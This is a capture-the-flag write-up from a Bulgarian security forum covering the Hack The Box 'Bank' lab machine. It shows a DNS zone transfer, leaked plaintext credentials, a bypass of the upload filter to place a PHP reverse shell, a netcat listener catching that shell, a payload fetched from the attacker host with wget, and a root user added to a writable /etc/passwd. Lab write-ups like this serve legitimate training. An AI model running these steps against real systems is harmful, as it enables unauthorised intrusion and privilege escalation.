Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps


h3xu

172 views

# Enumeration
### NMAP

The nmap scan reveals port 53, 80 and 22 open so we could assume that there is an http web application, DNS and ssh services. Let's enumerate the DNS and check out the findings in our browser.

Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


 

### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)
 

# dig axfr @10.10.10.29 bank.htb      

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)

# Web App Enumeration
#### /etc/hosts
Add the IP address to our known hosts file in /etc/hosts as:


 

10.10.10.29        bank.htb chris.bank.htb ns.bank.htb

#### chris.bank.htb bank.htb ns.bank.htb
 

#### Dirbuster

A couple of interesting directories were found for http://bank.htb including not present in the picture /balance-transfer/ directory.

*user* and *ticket* files does not return anything but footer on the other hand:

#### /balance-transfer/
Balance transfer is directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files. 

When opened, It seems that encryption failed since it is in plain text:

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===


 

# Exploit
I have logged in to the given account and discovered a Support page which provides file upload functionality which reveals a possible attack surface.

## LFI

The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with burp suite.

#### Burp Suite
After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila...


## Shell

Open a nc listener that will intercept the reverse call and execute the file.

$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php                                        
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234

***yikes***, I just hacked myself 😄

Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such extension will be executed as php. So I have uploaded the reverse shell as an htb and just opened it which returned a shell.

 

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

 

# Privilege EscalationWe are logged as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is writeable directory and download the file from my local kali system.
 

┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .      

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server                                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -

 

$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$ 

Let's upgrade out session to be more intuitive and responsive.

$ python -c 'import pty;pty.spawn("/bin/bash")'                 
www-data@bank:/tmp$ export TERM=xterm                                                                                
export TERM=xterm                                                                                                    
www-data@bank:/tmp$ ^Z                                                                                               
zsh: suspended  nc -nlvp 1234                                                                                        
                                                                                                                     
┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg                                                                                      148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 1234


 

Now I have tab-completion and all keys register as normal.

www-data@bank:/tmp$ chmod +x unix-privesc-check

www-data@bank:/tmp$ ./unix-privesc-check standard

...[snip]...
############################################
    Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd

Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password:

$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1

 

Next, add the user as follows:

www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password: 
root@bank:/# whoami
root
root@bank:/# 

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy